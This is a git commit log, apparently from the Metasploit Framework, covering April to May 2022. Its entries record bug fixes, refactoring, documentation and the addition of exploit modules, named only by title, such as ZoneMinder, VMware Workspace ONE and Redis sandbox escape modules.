Spencer McIntyre dd5aee4956 Increase the size of psexec commands 2022-05-09 11:55:57 -04:00
Spencer McIntyre eb03c9f131 Add the powershell adapters 2022-05-09 11:55:57 -04:00
Spencer McIntyre ba9b330f79 Fix merging arrays for adapted payloads 2022-05-09 11:55:57 -04:00
Spencer McIntyre 8206c24f4c Account for dynamic cached sizes in Windows payloads 2022-05-09 11:55:57 -04:00
adfoster-r7 4ad4ca32e8 Fix test alignment 2022-05-09 16:51:20 +01:00
adfoster-r7 0ce36f318e Move logic into client_request for consistency 2022-05-09 16:51:15 +01:00
adfoster-r7 709f369c79 Inline mock boundaries for clarity 2022-05-09 12:32:31 +01:00
h00die 6f6e7718dd nfs mount more intelligent 2022-05-08 11:35:59 -04:00
h00die 978dfe9b74 nfs mount more intelligent 2022-05-08 08:48:53 -04:00
adfoster-r7 deb163c882 Update ad_to_sqlite to store loot 2022-05-06 21:41:17 +01:00
Metasploit 855d77e763 automatic module_metadata_base.json update 2022-05-06 15:36:50 -05:00
Jack Heysel 51f255127e Land #16531, Fix login crash for pihole modules
Fixes a crash in various Pi-hole modules when login
authentication is required
2022-05-06 14:08:22 -06:00
adfoster-r7 b4ca6870f1 Land #16542, Fix nil channel id when trying to close channels 2022-05-06 19:03:15 +01:00
sjanusz cef38fb714 Fix nil channel id when trying to close channels 2022-05-06 17:09:36 +01:00
sjanusz 2e59f17439 Rename files to form_data 2022-05-06 16:41:19 +01:00
Metasploit 0ba06973b3 automatic module_metadata_base.json update 2022-05-06 09:48:39 -05:00
adfoster-r7 3b1792f436 Land #16529, Expose options for logging to a file in mettle 2022-05-06 15:29:00 +01:00
dwelch-r7 a7acd7c0f1 Land #16540, Update zeitwerk to ignore go pkg folder 2022-05-06 14:44:17 +01:00
dwelch-r7 1f4ee19c05 Expose options for logging to a file in mettle 2022-05-06 14:36:55 +01:00
adfoster-r7 6b21c9995c Update zeitwerk to ignore go pkg folder 2022-05-06 12:35:43 +01:00
adfoster-r7 94580793a3 Land #16533, Fix -w option flag for meterpreter reg command 2022-05-06 10:49:46 +01:00
Redouane NIBOUCHA 90937e6daa Address feedback from space-r7 2022-05-06 00:31:20 +02:00
Metasploit aa4ef5ae25 Weekly dependency updates for Gemfile.lock 2022-05-05 14:47:15 -05:00
Metasploit 567aa2019b automatic module_metadata_base.json update 2022-05-05 14:28:15 -05:00
Grant Willcox 3e5c8d6d4b Land #16538, Update meterpreter encryptor loader to support python 3.4 2022-05-05 14:09:10 -05:00
Grant Willcox 0a86d07014 Land #16491, Fix crashes on timeouts for multiple modules and Meterpreter 2022-05-05 13:34:29 -05:00
adfoster-r7 e7db0aec99 Update meterpreter encryptor loader to support python 3.4 2022-05-05 19:18:20 +01:00
Metasploit c26199e8e0 Bump version of framework to 6.1.42 2022-05-05 12:05:41 -05:00
Grant Willcox f6ea3a37a3 Land #16526, Update metasploit payloads to 2.0.87 2022-05-05 11:16:04 -05:00
Grant Willcox 86f1acc527 Land #16528, Update git-blame-ignore-revs to ignore tabs to spaces commits 2022-05-05 10:45:16 -05:00
Spencer McIntyre 7646bf9e0a Update the module docs 2022-05-05 11:26:37 -04:00
Spencer McIntyre ece5e2699a Automatically identify the HTTP method 2022-05-05 10:24:04 -04:00
Christophe De La Fuente aedab4c8aa Fix reg command -w option flag 2022-05-05 11:09:53 +02:00
Metasploit 82daa0c90f automatic module_metadata_base.json update 2022-05-04 17:56:15 -05:00
space-r7 e2cefe0750 Land #16514, add ZoneMinder exploit module 2022-05-04 17:37:08 -05:00
space-r7 dd0b124e84 fix typo in docs, check some responses 2022-05-04 17:28:37 -05:00
Metasploit 88db055a60 automatic module_metadata_base.json update 2022-05-04 17:23:39 -05:00
Jack Heysel 481699ed8f Land #16530, PiHole module to not wait for sudo
Update PiHole pihole_remove_commands_lpe module
to no wait for sudo input
2022-05-04 14:57:29 -07:00
vleminator 42b220c955 Merge pull request #1 from smcintyre-r7/pr/collab/16423
Pr/collab/16423
2022-05-04 20:58:46 +02:00
adfoster-r7 53052af988 Fix login crash for pihole modules 2022-05-04 19:42:39 +01:00
Jack Heysel b92fb4671f Update metasploit payloads to 2.0.87 2022-05-04 11:06:27 -07:00
sjanusz bc489fef91 Update PiHole module to not wait for sudo input 2022-05-04 17:24:43 +01:00
krastanoel 115dad7193 Why do i keep forgeting that res can be nil 2022-05-04 20:23:42 +07:00
krastanoel 10c1c75337 Fail the exploit when the target is not Zoneminder but the user enable the ForceExploit 2022-05-04 20:13:40 +07:00
krastanoel 54f6e270fe Make sure the target is a Zoneminder before parse the version, and check if the version is not nil 2022-05-04 20:02:37 +07:00
adfoster-r7 b18fe5c6af Update git-blame-ignore-revs to ignore tabs to spaces commits 2022-05-04 13:15:53 +01:00
Metasploit afa8258c4d automatic module_metadata_base.json update 2022-05-04 05:20:30 -05:00
adfoster-r7 35271b40e7 Land #16445, Add support for Windows Meterpreter logging to file 2022-05-04 11:01:23 +01:00
krastanoel 4c231ba226 Apply suggestions from code review
Remove unnecessary check for content-type response

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2022-05-04 16:37:20 +07:00
adfoster-r7 bbd881f999 Fix crashes on timeouts 2022-05-04 09:43:00 +01:00
Metasploit 172c1ca8a9 automatic module_metadata_base.json update 2022-05-03 16:52:11 -05:00
Spencer McIntyre 62bfe03b50 Land #16525, Fix VMware Workspace ONE Access 2022-05-03 17:33:46 -04:00
William Vu 6532365dc8 Deregister VHOST 2022-05-03 11:52:50 -05:00
William Vu 8c0cd40a19 Fix VMware Workspace ONE Access CVE-2022-22954 2022-05-03 10:39:58 -05:00
Metasploit 242472ae52 automatic module_metadata_base.json update 2022-05-03 10:08:13 -05:00
dwelch-r7 a76600f4a9 Land #16462, add support for armle/aarch64 architectures 2022-05-03 15:48:50 +01:00
Metasploit 2fd7ccb10d automatic module_metadata_base.json update 2022-05-03 09:41:50 -05:00
Spencer McIntyre 656d029c8e Land #16512, Add VMware CVE-2022-22954 2022-05-03 10:22:21 -04:00
krastanoel 8408f28967 checking status code response for successful exploitation 2022-05-03 20:47:36 +07:00
krastanoel c582f4277f res can be nil due to a timeout or other reason 2022-05-03 20:09:58 +07:00
krastanoel 4e6dddd735 Fail if the response is nil or the body is blank 2022-05-03 19:41:06 +07:00
krastanoel a1dcbb8004 Make sure the response content-type is json before parsing 2022-05-03 19:31:38 +07:00
krastanoel b4733afe2c Modify cookie jar, login and responses
- use keep_cookies instead of grabbing and set manually
- separate login code to its own method
- check response is not nil before calling get_html_document method
- clear cookie jar in exploit method and authenticate if user disable AutoCheck option
2022-05-03 17:54:59 +07:00
krastanoel 0f5e31d593 Apply suggestions from code review
Update documentation common default options

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2022-05-03 15:43:38 +07:00
William Vu 4ea72bb7a7 Add log IOC 2022-05-03 02:38:29 -05:00
William Vu b2994aa8d8 Add words 2022-05-03 01:13:45 -05:00
William Vu 9a980d068d Link to freemarker.template.utility.Execute docs 2022-05-03 01:00:46 -05:00
William Vu 612e3d6f13 Add another tested SSTI param 2022-05-03 00:30:12 -05:00
William Vu 333681b6da Add other tested SSTI URIs 2022-05-03 00:02:21 -05:00
William Vu a71ded0da8 Update PoC credit 2022-05-02 23:41:43 -05:00
William Vu fa09487ee1 Refactor code, once more with feeling 2022-05-02 22:27:52 -05:00
William Vu 135a81ebc2 Refactor code 2022-05-02 21:53:17 -05:00
William Vu 184b1b1e76 Add module doc 2022-05-02 20:41:01 -05:00
William Vu bf7d3e1c32 Add VMware Workspace ONE Access CVE-2022-22954 2022-05-02 18:51:46 -05:00
adfoster-r7 1d2a9fa523 Land #16520, improve pull request filter to reference owner 2022-05-02 21:55:19 +01:00
Spencer McIntyre 7faac7faa4 Update the JSP file to delete itself 2022-05-02 14:34:51 -04:00
Jeffrey Martin f4131817f0 improve PR filter to reference owner
When using `head` to filter the PR list user or head organization
and branch name in the format of `user:ref-name` or `organization:ref-name`
are required.
2022-05-02 12:22:01 -05:00
Jack Heysel 32f120aa23 Land #16513, Fix whitespace lint issue in test
This fixes the whitespace linting issues within the test folder.
2022-05-02 10:01:26 -07:00
Spencer McIntyre 3bdb8e02e2 Use an exponential backoff to retry 2022-05-02 12:30:43 -04:00
Spencer McIntyre 0f8a35e4d3 Whitespace, grammar and timing changes 2022-05-02 10:45:21 -04:00
krastanoel 4e2328fc89 Return safe checkcode when authentication failed to benefit from autocheck module 2022-04-30 03:45:06 +07:00
krastanoel dbc49c67e6 Use nokogiri over regex to parse csrf_magic value 2022-04-30 03:16:37 +07:00
krastanoel 538e3569f4 No need to use rescue block on check method for supported ruby version 2022-04-30 03:12:27 +07:00
krastanoel a7670b1bfe Fix Inconsistent indentation detected. 2022-04-30 01:46:13 +07:00
krastanoel f1f0ec5435 Apply suggestions from code review
Remove RPORT option and rescue block

Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
2022-04-30 01:18:56 +07:00
krastanoel e27627fbbf Assign check result to an instance variable 2022-04-29 23:01:15 +07:00
krastanoel ae23be355b Remove rand method 2022-04-29 22:34:34 +07:00
dwelch-r7 3a8fb2b480 Update cached sizes 2022-04-29 15:41:57 +01:00
Adrian Vollmer d6547c0bc1 Use XML parser instead of regex 2022-04-29 16:19:58 +02:00
Metasploit 9737d030a7 automatic module_metadata_base.json update 2022-04-29 09:19:07 -05:00
dwelch-r7 1a551138cd Bump payloads version 2022-04-29 15:09:05 +01:00
dwelch-r7 2e44a91b39 Refactor debugging config options to a common location 2022-04-29 15:04:12 +01:00
dwelch-r7 db1d42237b Refactor debugging config options 2022-04-29 15:04:12 +01:00
dwelch-r7 e93253fb38 Conditionally send log path configuration for meterpreter 2022-04-29 15:04:11 +01:00
dwelch-r7 ec9f0b5242 Add log path session config option 2022-04-29 15:04:11 +01:00
Spencer McIntyre c994f8e933 Land #16507, Add WSO2 file upload RCE module 2022-04-29 09:58:55 -04:00
krastanoel 328448e8d4 Get current language before resetting it 2022-04-29 20:52:58 +07:00
krastanoel 7816ffb7c3 Remove checkcode in exploit method and use fail_with instead, no need to use rand method 2022-04-29 19:45:51 +07:00
krastanoel e58fff1ac3 Remove fail_with in check method and return both checkcode and message instead of print 2022-04-29 19:36:36 +07:00
adfoster-r7 ee2d1423af Add missing option name 2022-04-29 10:18:52 +01:00
adfoster-r7 0facf90bd0 Add deprecation notice 2022-04-29 01:13:16 +01:00
adfoster-r7 d226369c20 Update deprecation notice 2022-04-29 00:54:44 +01:00
adfoster-r7 c7c61ac481 Land #16516, Add logging to Github action 2022-04-28 23:32:46 +01:00
Jeffrey Martin 2934fe6ab8 add context to log entries 2022-04-28 17:03:31 -05:00
Jeffrey Martin 9b3424f166 log for PR status 2022-04-28 16:55:38 -05:00
Jeffrey Martin 6b6dff0c6a unique constants 2022-04-28 15:00:14 -05:00
Jeffrey Martin 7f386e635c expand weekly deps PR logging 2022-04-28 14:53:22 -05:00
Jack Heysel 78bea096a2 Land PR #16506, Fix extraneous whitespace
This PR fixes an extraneous whitespace in tunnel info
2022-04-28 10:52:18 -07:00
Metasploit 0de720aba4 Bump version of framework to 6.1.41 2022-04-28 12:07:33 -05:00
Jack Heysel 2b8ea72e51 Added autocheck fixed execute_payload method 2022-04-28 08:55:17 -07:00
krastanoel bb8c130740 Fix docs typo 2022-04-28 21:57:18 +07:00
adfoster-r7 58c1ff3995 Add git-blame-ignore-revs 2022-04-28 15:12:49 +01:00
adfoster-r7 29cc349649 Run rubocop --fix-layout test 2022-04-28 15:06:43 +01:00
krastanoel eba436dd99 Add Zoneminder Language rce module docs 2022-04-28 21:01:00 +07:00
krastanoel 7c371b65ee Add Zoneminder Language rce module 2022-04-28 20:59:53 +07:00
adfoster-r7 bf00619717 Update rubocop rules for test modules 2022-04-28 14:11:26 +01:00
Christophe De La Fuente 25a883806a Land #16439, [Test module] Remove obsolete PostgreSQL test module. Replace it with one for all the supported DBMS 2022-04-28 13:01:56 +02:00
Christophe De La Fuente 365cebce1a Fix rubocop issues 2022-04-28 13:00:45 +02:00
Adrian Vollmer 267f7a541d Update modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2022-04-28 08:25:32 +02:00
Redouane NIBOUCHA f6ff5dde75 Fix hash format (make it compatible with john the ripper) 2022-04-28 06:05:59 +02:00
Metasploit 113b3d6cbc automatic module_metadata_base.json update 2022-04-27 17:24:36 -05:00
vleminator f8887dbf1c Reflect changes in the console output 2022-04-28 00:22:44 +02:00
vleminator b28831715d Merge branch 'cve-2022-22965' of github.com:vleminator/metasploit-framework into cve-2022-22965 2022-04-28 00:18:28 +02:00
adfoster-r7 58f30b2e62 Land #16510, replace Chrome with Thunderbird 2022-04-27 23:04:11 +01:00
vleminator 1185cfd99f Add support for payload dropper with windows path (backslash) 2022-04-28 00:02:19 +02:00
vleminator 6c75b7efcb Add WriteableDir as an advanced module option 2022-04-27 23:38:51 +02:00
vleminator 868d35a1ed bugfix encoding of the jsp payload dropper 2022-04-27 23:35:31 +02:00
vleminator 71eb6e6fb6 Refactor code to improve readability and remove unused code 2022-04-27 23:32:36 +02:00
jvoisin f30c797293 Fix two simple typo 2022-04-27 21:58:02 +02:00
Spencer McIntyre 21f8494366 Land #16509, Ensure HTML is escaped in markdown codeblocks 2022-04-27 15:18:50 -04:00
adfoster-r7 9f6950c6c8 Ensure HTML is escaped in markdown codeblocks 2022-04-27 19:51:05 +01:00
Metasploit 779429adcf automatic module_metadata_base.json update 2022-04-27 13:37:14 -05:00
space-r7 75e5a32b8b Land #16504, add Redis sandbox escape exploit 2022-04-27 13:17:02 -05:00
Jack Heysel 5b82a978ea Added reference removed default payload 2022-04-27 09:48:21 -07:00
Jack Heysel 253cb8580a Responded to comments added retry_until_true 2022-04-27 09:45:18 -07:00
vleminator f57bdabb41 Refine the check method to perform less-invasive exploit validation 2022-04-27 14:05:47 +02:00
adfoster-r7 109dffe6f6 Land request #16496, sessions -K should kill sessions in reverse order 2022-04-27 12:07:23 +01:00
Redouane NIBOUCHA f0b1aa44c9 Remove unneeded else statements 2022-04-27 12:44:49 +02:00
Redouane NIBOUCHA 247ae89c43 Use constants for JTR formats instead of strings 2022-04-27 03:25:26 +02:00
Jack Heysel a941fea26a Removed unused import added target_uri 2022-04-26 14:11:10 -07:00
Jack Heysel a8ae08d138 Updated authors 2022-04-26 13:55:59 -07:00
Jack Heysel 86ff080d31 Merge branch 'wso2-file-upload-rce' of github.com:jheysel-r7/metasploit-framework into wso2-file-upload-rce 2022-04-26 13:53:17 -07:00
Jack Heysel 1879a7568f Updated authors 2022-04-26 13:52:59 -07:00
jheysel-r7 266d3bb9ca Apply suggestions from @bcoles code review
Co-authored-by: bcoles <bcoles@gmail.com>
2022-04-26 13:40:25 -07:00
Jack Heysel 691d9fe001 Added Reliability section to Notes 2022-04-26 13:19:34 -07:00
Jack Heysel 76c8e0b65f Added Notes section to module 2022-04-26 13:01:38 -07:00
Jack Heysel 37c8fff523 Rubocop offenses 2022-04-26 12:51:12 -07:00
Jake Baines 1b119a845c Fixed handling of victim response 2022-04-26 12:34:45 -07:00
William Vu a00d0c8c82 Fix extraneous whitespace in tunnel info 2022-04-26 14:31:01 -05:00
Jack Heysel ca0be9c145 Add WSO2 file upload RCE module 2022-04-26 12:29:12 -07:00
Jake Baines ec37ebc617 Update modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2022-04-26 14:43:03 -04:00
Jake Baines de453b8970 Update documentation/modules/exploit/linux/redis/redis_debian_sandbox_escape.md
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2022-04-26 14:42:57 -04:00
Adrian Vollmer dfdd57e8a3 Improve regex parsing in lotus_domino_hashes
* The closing quotes after the `VALUE` attribute were not escaped. This
  commit adds them
* The regex assumed that the short name does not contain whitespace.
  I am looking at a Domino instance where the short name DOES contain
  whitespace. This commit changes the regex such that the value is
  assumed to not contain a quote before the closing quote. Of course,
  there could be an escaped quote inside quotes in the HTML source, but
  if we want to do it properly, we'd need an HTML parser which exceeds
  my modest ruby skills.
* The fields `$dspHTTPPassword` and `dspHTTPPassword` (without the
  dollar sign) can both contain the hash. The code assumed that only up
  to one of those fields contain a hash. This leads to the hash being
  printed twice in the output in my case.
2022-04-26 15:46:56 +02:00
Jake Baines d20fd996bd Fix spelling mistakes 2022-04-26 03:38:23 -07:00
Jake Baines 71a4023c0d Initial commit of Redis sandbox escape CVE-2022-0543 2022-04-26 03:32:11 -07:00
Brendan Coles 02d911e655 gdb_server_exec: Cleanup and add support for armle/aarch64 architectures 2022-04-25 19:25:06 +00:00
Simon Janusz f61ec32808 Land #16495, Add docs build to CI
Add docs build to CI
2022-04-25 17:12:39 +01:00
npm-cesium137-io 7190a967ce Refactor MKII vcenter_forge_saml_token 2022-04-25 11:44:39 -04:00
Tim W e1802de7b8 Fix #16084, sessions -K should kill sessions in reverse order 2022-04-25 16:39:22 +01:00
adfoster-r7 0cba703b7e Add docs build to CI 2022-04-25 16:14:58 +01:00
sjanusz 4ec4b89d00 Add upload of files to HttpClient & update a module to use it 2022-04-25 14:55:37 +01:00
dwelch-r7 969419f35f Land #16486, Add initial pentesting docs section 2022-04-25 13:20:55 +01:00
adfoster-r7 4912b81388 Scroll improvements 2022-04-25 12:08:15 +01:00
adfoster-r7 86dad983e5 Land #16494, Typo fix on line 4 of Metasploit Version API 2022-04-25 12:01:06 +01:00
George Britton ea1d87af4d Typo fix on line 4
Like -> Lie
2022-04-25 11:17:14 +01:00
npm-cesium137-io ab98aee3a4 Remove unrelated module files 2022-04-23 19:50:05 -04:00
npm-cesium137-io 3e07b8c99b Refactor MKI vcenter_forge_saml_token.rb
Extensive refactoring to move away from directly manipulating datastore
options and use local variables instead.

The initial template generation method has been redesigned to use an
external file via Erubi::Engine which is much cleaner vs. jamming a
multiline string into the module.

Response HTML from vCenter is now parsed with Nokogiri HTML vs. pulling
it out with regex.

Registered options have been reworked, following suggestions and
feedback. The use of VHOST in particular eliminates the need to pass
RHOSTS to the template and makes the module behave more closely to "real"
vCenter (i.e., always uses FQDN for the destination).

Added advanced datastore options to control the token lifetime
NOT_BEFORE and NOT_AFTER skew, in seconds. This also uncovered a bug with
the way I was deriving Zulu time which skewed based on the local system
time zone offset from Zulu; this has been fixed.

Corrected a stupid typo in the validate_fqdn method (don't need to check
for capital letters if the test string is always downcase...)

validate_idp_options now uses File.binread and can process certs in keys
in DER or PEM instead of just PEM.

Code optimization, particularly around error handling; other minor
tweaks based on improved understanding of the Framework's capabilities.

Many style changes and modifications based on suggestions and feedback.

Documentation was updated to reflect reality.
2022-04-23 19:42:24 -04:00
h00die 3b5719ec88 nfs mount more intelligent 2022-04-23 07:11:00 -04:00
h00die 44ab99c89f nfs mount more intelligent 2022-04-23 07:02:37 -04:00
adfoster-r7 76357407f0 Add WinRM section 2022-04-23 04:29:52 +01:00
adfoster-r7 f3f4536f44 Fix typo 2022-04-23 04:09:12 +01:00
adfoster-r7 eb61076c26 Align lab details 2022-04-23 03:49:56 +01:00
adfoster-r7 08fc0a58fd Add WinRM details 2022-04-23 03:49:38 +01:00
adfoster-r7 27b8cb784b Add pentesting section 2022-04-23 01:20:07 +01:00
adfoster-r7 bad090716c Add HTTP preamble 2022-04-22 17:50:01 +01:00
adfoster-r7 8f459e7144 Add additional preamble to multiple guides 2022-04-22 17:12:13 +01:00
adfoster-r7 a20c281507 Use wordlist for clarity 2022-04-22 14:28:34 +01:00
bwatters f737e78b87 Land #16480, shift test for cache change to exit code
Merge branch 'land-16480' into upstream-master
2022-04-22 08:05:46 -05:00
adfoster-r7 fc9e7b6b81 Post gather modules boilerplate 2022-04-22 13:25:02 +01:00
Redouane NIBOUCHA 2043d96ae9 Update service_name 2022-04-22 07:22:33 +02:00
Redouane NIBOUCHA 87a21bd117 Add the MSSQL injection library 2022-04-22 06:19:36 +02:00
Redouane NIBOUCHA f21f786c06 Use #create_credential_login instead of the deprecated #report_auth_info 2022-04-22 06:06:05 +02:00
Metasploit 397ab70eba automatic module_metadata_base.json update 2022-04-21 22:06:41 -05:00
Jack Heysel 74e69917c6 Land #16450 VNC Keyboard exec fast typing fix
This PR adds small delays in the VNC Keyboard
Exec to avoid typing long commands too fast.
2022-04-21 19:45:46 -07:00
Jack Heysel 1e40595c53 Fixed typo in TIME_KBD_THRESHOLD option 2022-04-21 19:32:57 -07:00
adfoster-r7 8e3fd5a1ce Add initial kubernetes documentation 2022-04-21 23:49:54 +01:00
Jeff McJunkin d1034c8b57 s4u_persistence.rb: Allow all post-Vista builds
Currently this module doesn't account for Server builds 2016 and above, nor Windows 10 builds. This PR fixes the `sysinfo` comparison to allow later builds.

Note: Many other modules have this problem, and it's probably worth Rapid7 staff time to standardize the usage of build comparisons inside modules.
2022-04-21 15:33:42 -07:00
adfoster-r7 2f265d6e45 Rename pages for clarity 2022-04-21 23:02:25 +01:00
adfoster-r7 d79c56f221 Fix dead link 2022-04-21 21:59:59 +01:00
adfoster-r7 3753c8bcfb Fix dead link 2022-04-21 21:58:21 +01:00
Metasploit 6cebb69d6d automatic module_metadata_base.json update 2022-04-21 15:33:00 -05:00
Jeffrey Martin 274c050ae1 shift test for cache change to exit code 2022-04-21 15:27:34 -05:00
adfoster-r7 e733be7203 Add separate pages for workflows and guides 2022-04-21 21:18:56 +01:00
Jack Heysel 140c3bfd50 Land #16432 Enumerate Windows AV module
Post module that will query WMI via shell
or meterpreter session for deployed AV products
from the root\SecurityCenter2 namespace
2022-04-21 13:07:56 -07:00
Jack Heysel 7be74eca8b Updated spacing 2022-04-21 11:52:27 -07:00
Jack Heysel f011e923e2 Fixed docs 2022-04-21 11:45:26 -07:00
Jack Heysel d8542ad2b5 Changed vprint to print update docs 2022-04-21 11:35:33 -07:00
Metasploit 362ebe5313 Bump version of framework to 6.1.40 2022-04-21 12:04:56 -05:00
Metasploit b9fc2d9291 automatic module_metadata_base.json update 2022-04-21 11:42:05 -05:00
Jack Heysel 17c97fa4dc Merge branch 'feature/win_enum_av' of github.com:sempervictus/metasploit-framework into feature/win_enum_av 2022-04-21 09:24:40 -07:00
Jack Heysel 5411b6b909 Added docs 2022-04-21 09:24:13 -07:00
jheysel-r7 841fd12519 Update modules/post/windows/gather/enum_av.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2022-04-21 09:23:11 -07:00
Grant Willcox e2c6c36b2b Land #1642, Add module for cve-2022-0995 2022-04-21 09:12:47 -05:00
npm-cesium137-io 2e7ae40fcb Revise vcenter_secrets_dump 2022-04-21 09:51:51 -04:00
bwatters 9cba9576cd Keep code reusable and fix some logical complexities 2022-04-21 07:44:40 -05:00
Metasploit 1e97ced013 automatic module_metadata_base.json update 2022-04-21 04:31:23 -05:00
adfoster-r7 104071e816 Land #16483, fix typo 'MetaSploit' in readme and comment 2022-04-21 10:13:14 +01:00
Metasploit ce76ff44d1 automatic module_metadata_base.json update 2022-04-21 00:48:13 -05:00
Jack Heysel d3c9648af0 Land #16438, Fix smtp server auth prompt
Some smtp servers only give out creds when promted.
Now there exists a mondule option 'AUTHPROMPT' to indicate
whether or not the auth prompt is required by the server.
2022-04-20 22:21:55 -07:00
Redouane NIBOUCHA 2e04c1b8f7 Remove references to PostgreSQL 2022-04-21 06:57:50 +02:00
Anton Panteleev 9297c0e058 FIX: typo 'MetaSploit' in readme and comment 2022-04-21 14:44:57 +10:00
Grant Willcox 69b54c8448 Add in additional validation to check methods to address bcoles's comments and also to prevent issues with fail_with being used inside a check method 2022-04-20 19:50:08 -05:00
Grant Willcox f33e3f45c1 RuboCop compliance for PacketStorm 2022-04-20 19:09:14 -05:00
Grant Willcox 78d4ac8592 Update module reliability and also fix issues from bcoles's review 2022-04-20 19:04:27 -05:00
Grant Willcox 86a978388c Land #16479, Meterpreter's reg setval command: add support to binary data when setting a REG_BINARY key value 2022-04-20 17:53:36 -05:00
bwatters fb4d12a558 Semicolon.... 2022-04-20 17:41:16 -05:00
bwatters 26f9175816 Update c source with argc check and CRASH notes for module 2022-04-20 17:37:48 -05:00
Grant Willcox 7aa36a65d6 Add in additional validation options and rework the regex a bit so that we only match on valid hex characters. 2022-04-20 17:11:14 -05:00
Metasploit 2bbaf84e2e automatic module_metadata_base.json update 2022-04-20 14:41:20 -05:00
bwatters d9a241defb Fix overzealous source code edit and some version copy/pasta errors 2022-04-20 14:31:32 -05:00
Spencer McIntyre 8e2bd3c5a9 Land #16475, ManageEngine ADSelfService Plus RCE 2022-04-20 15:22:36 -04:00
Spencer McIntyre bf1f786813 Title case the target name 2022-04-20 15:22:07 -04:00
adfoster-r7 2f4a09c9c8 Updated Meterpreter Debugging Meterpreter Sessions (markdown) 2022-04-20 19:30:22 +01:00
adfoster-r7 f417dbdd6e Updated Meterpreter Debugging Meterpreter Sessions (markdown) 2022-04-20 19:23:23 +01:00
adfoster-r7 9c2c377e0a Add MeterpreterDebugBuild examples 2022-04-20 19:22:06 +01:00
adfoster-r7 7e3825d927 Document setg SessionTlvLogging 2022-04-20 18:13:40 +01:00
Jack Heysel 2f5f5c83d7 Land #16437 add esxi to ssh_login platforms
Fixes #16431 by adding ESXi as a recognizable
type on ssh_login
2022-04-20 07:35:18 -07:00
Jake Baines aba48a6905 Improve JSON cleanup, fix jjs specific wording, and moved JJS_PATH to defaultoptions 2022-04-20 06:27:43 -07:00
Metasploit deda43fe51 automatic module_metadata_base.json update 2022-04-20 08:08:45 -05:00
adfoster-r7 62a7617acb Land #16478, Rubocop fix for arista_tacplus_shell lint msftidy error 2022-04-20 13:49:37 +01:00
Christophe De La Fuente 99789c81de Add support to binary data with setting a REG_BINARY key value 2022-04-20 12:12:57 +02:00
Jack Heysel dd0be6cad5 Rubocop fix for arista_tacplus_shell 2022-04-19 22:38:50 -07:00
Metasploit c59495cc5f automatic module_metadata_base.json update 2022-04-20 00:33:52 -05:00
Jack Heysel 4417a335ff Land #16379, Make SSH defaults widely used
Refactored a number of modules to use ssh_client_defaults
2022-04-19 22:08:45 -07:00
Metasploit 03991f5166 automatic module_metadata_base.json update 2022-04-19 17:42:19 -05:00
Grant Willcox 6bd07fd1ab Land #16477, Modules: Prefer CVE references over cve.mitre.org URL references 2022-04-19 17:18:08 -05:00
Grant Willcox 76acc0e56a Land #16476, msftidy - Prefer cve.org URL references over cve.mitre.org URL references 2022-04-19 17:04:21 -05:00
Grant Willcox a756df5400 Add in missing RuboCop note sections 2022-04-19 16:40:57 -05:00
Brendan Coles 94ed9ae28b Modules: Prefer CVE references over cve.mitre.org URL references 2022-04-19 20:42:23 +00:00
Brendan Coles b8be080615 msftidy: Prefer CVE references over cve.mitre.org URL references 2022-04-19 20:35:21 +00:00
Jake Baines c77e12e0c5 Fixed the name of the jjs cmd 2022-04-19 11:28:26 -07:00
Grant Willcox 42c94fee81 Land #16457, Restore multi-char short flag support 2022-04-19 12:44:10 -05:00
Grant Willcox 1e67d62f42 Minor fix to improve readability 2022-04-19 12:43:57 -05:00
Jake Baines ae54c8c3d9 Initial implementation of authenticated RCE against ManageEngine ADSelfService Plus (CVE-2022-28810) 2022-04-19 10:33:54 -07:00
ORelio 1fdedebacf Add settings to adjust delay and interval
TIME_KBD_DELAY: Delay in milliseconds (0 to disable)
TIME_KBD_TRESHOLD: How many keys between each delay
2022-04-19 17:40:14 +02:00
adfoster-r7 253f791478 Land #16470, restrict ruby_smb to patch version 2022-04-19 10:15:08 +01:00
Heyder Andrade fd6c8aa3d5 Lint msftidy 2022-04-18 23:36:23 +02:00
Jeffrey Martin 617df4da74 restrict ruby_smb to patch version
Based on https://github.com/rapid7/ruby_smb/blob/4fac10d8a7919c421badabedccd9d4d7902a9901/CONTRIBUTING.md#versioning

Locking version to patch level as framework takes performs manipulation of bindata structures.
2022-04-18 16:01:13 -05:00
Heyder Andrade b363a7e403 Merge branch 'fix/ssh_defaults_usage' of github.com:heyder/metasploit-framework into fix/ssh_defaults_usage 2022-04-18 20:19:36 +02:00
Heyder Andrade 4252fe01e6 Rubocop 2022-04-18 20:17:44 +02:00
Heyder Andrade 9e54830f93 Making SSH defaults widely used 2022-04-18 20:16:34 +02:00
Heyder Andrade bdc69d8399 Rubocop 2022-04-18 20:14:57 +02:00
Heyder Andrade 83793b6df7 Making SSH defaults widely used 2022-04-18 20:12:04 +02:00
Heyder Andrade 91c08b3fac Rubocop 2022-04-18 20:09:52 +02:00
Heyder Andrade 244d04fa4f Making SSH defaults widely used 2022-04-18 20:08:27 +02:00
Heyder Andrade 42d7e4f3b7 Rubocop 2022-04-18 20:05:46 +02:00
Heyder Andrade fcef6dd515 Making SSH defaults widely used 2022-04-18 19:46:51 +02:00
Heyder Andrade 0058a3aef0 Rubocop 2022-04-18 19:43:16 +02:00
space-r7 500d08f08e Land #16426, fix osx stager crash in osx Monterey 2022-04-18 12:38:51 -05:00
Heyder Andrade 5388ac5613 Making SSH defaults widely used 2022-04-18 19:36:37 +02:00
Heyder Andrade 6f1a6ce712 Rubocop 2022-04-18 19:34:49 +02:00
Heyder Andrade e34bff1b85 Making SSH defaults widely used 2022-04-18 19:30:43 +02:00
Heyder Andrade 2f3710f91b Rubocop 2022-04-18 19:25:38 +02:00
Heyder Andrade e1d12e47c3 Making SSH defaults widely used 2022-04-18 19:22:56 +02:00
Heyder Andrade c4d8ff839e Rubocop 2022-04-18 19:12:50 +02:00
Jack Heysel 37e334f95d Rubocop 2022-04-18 09:36:52 -07:00
Jack Heysel 9e283ae1b1 Refactored aassigned list of modules 2022-04-18 09:35:08 -07:00
Heyder Andrade 7431f76c19 Making SSH defaults widely used 2022-04-18 18:03:57 +02:00
